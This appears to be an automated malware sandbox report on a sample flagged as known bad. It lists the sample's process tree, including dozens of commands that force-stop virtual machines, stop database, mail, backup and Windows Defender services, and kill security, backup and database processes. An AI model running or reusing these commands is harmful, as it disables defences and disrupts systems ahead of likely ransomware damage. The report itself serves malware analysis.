Analysis Overview
SHA256
8ec919064791aa84aad6bb1374d6c67a8f5c254820f2f9a849a78f61eb6fada2
Threat Level: Known bad
The file 7850996135.zip was found to be: Known bad.
Malicious Activity Summary
Reads user/profile data of web browsers
Checks computer location settings
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-11 18:09
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-11 18:09
Reported
2022-08-11 18:13
Platform
win10v2004-20220721-en
Max time kernel
154s
Max time network
165s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\d11793433065633b84567de403c1989640a07c9a399dd2753aaf118891ce791c.exe | N/A |
Reads user/profile data of web browsers
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d11793433065633b84567de403c1989640a07c9a399dd2753aaf118891ce791c.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\d11793433065633b84567de403c1989640a07c9a399dd2753aaf118891ce791c.exe
C:\Users\Admin\AppData\Local\Temp\d11793433065633b84567de403c1989640a07c9a399dd2753aaf118891ce791c.exe --pass D86BDXL9N3H
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -command "Get-VM | Stop-VM -Force"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop MSSQLServerADHelper100
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop MSSQL$ISARS
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop MSSQL$MSFW
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Get-VM | Stop-VM -Force"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop SQLAgent$ISARS
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop SQLAgent$MSFW
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop SQLBrowser
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop ReportServer$ISARS
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop SQLWriter
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop WinDefend
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop mr2kserv
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop MSExchangeADTopology
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop MSExchangeFBA
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop MSExchangeIS
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop MSExchangeSA
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop ShadowProtectSvc
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop SPAdminV4
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop SPTimerV4
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop SPTraceV4
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop SPUserCodeV4
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop SPWriterV4
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop SPSearch4
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop MSSQLServerADHelper100
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop IISADMIN
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop firebirdguardiandefaultinstance
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop ibmiasrw
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QBCFMonitorService
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QBVSS
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QBPOSDBServiceV12
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop IISADMIN
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop "Simply Accounting Database Connection Manager"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB2
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB3
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB4
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB5
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB6
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB7
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB8
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB9
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB10
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB11
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB12
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB13
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB14
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB15
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB16
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB17
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB18
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB19
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB20
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB21
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB22
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB23
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB24
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" net stop QuickBooksDB25
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im mysql*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im dsa*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im veeam*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im chrome*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im iexplore*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im firefox*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im outlook*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im excel*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im outlook*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im taskmgr*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im tasklist*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im Ntrtscan*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im ds_monitor*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im Notifier*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im putty*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im ssh*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im iVPAgent*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im TmListen*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im CNTAoSMgr*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im IBM*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im black*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im bes10*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im copy*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im robo*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im sql
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im store.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im sql*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im vee*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im wrsa.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im postg*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im sage*
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill /f /im wrsa*
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | tcp | |
| US | 20.44.10.122:443 | tcp | |
| FR | 2.18.109.224:443 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 8.8.8.8:53 | 151.122.125.40.in-addr.arpa | udp |
| US | 93.184.221.240:80 | tcp |
Files
memory/3572-130-0x0000000000000000-mapping.dmp
memory/1724-131-0x0000000000000000-mapping.dmp
memory/3328-132-0x0000000000000000-mapping.dmp
memory/2996-134-0x0000000000000000-mapping.dmp
memory/2144-135-0x0000000000000000-mapping.dmp
memory/652-133-0x0000000000000000-mapping.dmp
memory/464-136-0x0000000000000000-mapping.dmp
memory/3424-137-0x0000000000000000-mapping.dmp
memory/1828-138-0x0000000000000000-mapping.dmp
memory/376-139-0x0000000000000000-mapping.dmp
memory/1200-140-0x0000000000000000-mapping.dmp
memory/1256-141-0x0000000000000000-mapping.dmp
memory/2996-142-0x00000000045F0000-0x0000000004626000-memory.dmp
memory/4164-144-0x0000000000000000-mapping.dmp
memory/4140-143-0x0000000000000000-mapping.dmp
memory/4212-145-0x0000000000000000-mapping.dmp
memory/2996-147-0x0000000004CC0000-0x00000000052E8000-memory.dmp
memory/4240-146-0x0000000000000000-mapping.dmp
memory/4304-148-0x0000000000000000-mapping.dmp
memory/4352-149-0x0000000000000000-mapping.dmp
memory/4412-150-0x0000000000000000-mapping.dmp
memory/4476-151-0x0000000000000000-mapping.dmp
memory/4532-152-0x0000000000000000-mapping.dmp
memory/2996-153-0x0000000004C20000-0x0000000004C42000-memory.dmp
memory/2996-154-0x0000000005520000-0x0000000005586000-memory.dmp
memory/4608-156-0x0000000000000000-mapping.dmp
memory/2996-155-0x0000000005590000-0x00000000055F6000-memory.dmp
memory/4652-157-0x0000000000000000-mapping.dmp
memory/4664-158-0x0000000000000000-mapping.dmp
memory/4748-159-0x0000000000000000-mapping.dmp
memory/4840-161-0x0000000000000000-mapping.dmp
memory/4792-160-0x0000000000000000-mapping.dmp
memory/4892-162-0x0000000000000000-mapping.dmp
memory/4932-163-0x0000000000000000-mapping.dmp
memory/4996-165-0x0000000000000000-mapping.dmp
memory/4976-164-0x0000000000000000-mapping.dmp
memory/5056-166-0x0000000000000000-mapping.dmp
memory/4112-167-0x0000000000000000-mapping.dmp
memory/4616-168-0x0000000000000000-mapping.dmp
memory/4704-169-0x0000000000000000-mapping.dmp
memory/2996-170-0x0000000005BC0000-0x0000000005BDE000-memory.dmp
memory/4252-171-0x0000000000000000-mapping.dmp
memory/4580-172-0x0000000000000000-mapping.dmp
memory/5156-173-0x0000000000000000-mapping.dmp
memory/5216-175-0x0000000000000000-mapping.dmp
memory/5188-174-0x0000000000000000-mapping.dmp
memory/5320-176-0x0000000000000000-mapping.dmp
memory/5352-177-0x0000000000000000-mapping.dmp
memory/5420-178-0x0000000000000000-mapping.dmp
memory/5444-179-0x0000000000000000-mapping.dmp
memory/5536-181-0x0000000000000000-mapping.dmp
memory/5512-180-0x0000000000000000-mapping.dmp
memory/5616-182-0x0000000000000000-mapping.dmp
memory/5672-183-0x0000000000000000-mapping.dmp
memory/5732-185-0x0000000000000000-mapping.dmp
memory/5712-184-0x0000000000000000-mapping.dmp
memory/5828-187-0x0000000000000000-mapping.dmp
memory/5808-186-0x0000000000000000-mapping.dmp
memory/5868-188-0x0000000000000000-mapping.dmp
memory/5936-189-0x0000000000000000-mapping.dmp
memory/6020-191-0x0000000000000000-mapping.dmp
memory/6008-190-0x0000000000000000-mapping.dmp
memory/6100-192-0x0000000000000000-mapping.dmp
memory/2996-193-0x0000000006190000-0x00000000061C2000-memory.dmp
memory/2996-194-0x0000000070510000-0x000000007055C000-memory.dmp
memory/2996-196-0x0000000006B80000-0x0000000006B9E000-memory.dmp
memory/5236-195-0x0000000000000000-mapping.dmp
memory/5360-197-0x0000000000000000-mapping.dmp
memory/5740-198-0x0000000000000000-mapping.dmp
memory/5944-199-0x0000000000000000-mapping.dmp
memory/5484-200-0x0000000000000000-mapping.dmp
memory/2996-201-0x0000000007510000-0x0000000007B8A000-memory.dmp
memory/2996-202-0x0000000006ED0000-0x0000000006EEA000-memory.dmp
memory/6184-203-0x0000000000000000-mapping.dmp
memory/6216-204-0x0000000000000000-mapping.dmp
memory/2996-205-0x0000000006F40000-0x0000000006F4A000-memory.dmp
memory/2996-206-0x0000000007150000-0x00000000071E6000-memory.dmp
memory/2996-207-0x0000000007100000-0x000000000710E000-memory.dmp
memory/2996-208-0x0000000007210000-0x000000000722A000-memory.dmp
memory/2996-209-0x00000000071F0000-0x00000000071F8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 8f96320ab4e0bc1369dc19e92e8a80f9 |
| SHA1 | f6b6ce97cc2d25420cedb7fd56e1997f0708784a |
| SHA256 | 8e7fbdb100e3011090351fa85b0c0a45b729e3e69cc27de6983868a9a5e80677 |
| SHA512 | 1c49036de8852e3618939e722294a8353b6ab827d978740fb05954d2ca377e45ab81bcee1130373475d0ce0402c95cf53e9aaac41650b858fec73201c1abc795 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3902e23c5e6e1dc28aa5090a1a48aac7 |
| SHA1 | 4a20ad2bb624336bb144dbf2351a924122a5fdcf |
| SHA256 | f4fc7755d3123d09d8bddb28570c163ffe1a6303a602c181ae4102583d051b43 |
| SHA512 | e0b62395cd6c7cbd59a0a0f444eb0241e4b4a2a9510170102191acbb3d8e593da76b045b8b1fc59675bd8cc4336330982082114a661e947b7a096ce817da03b3 |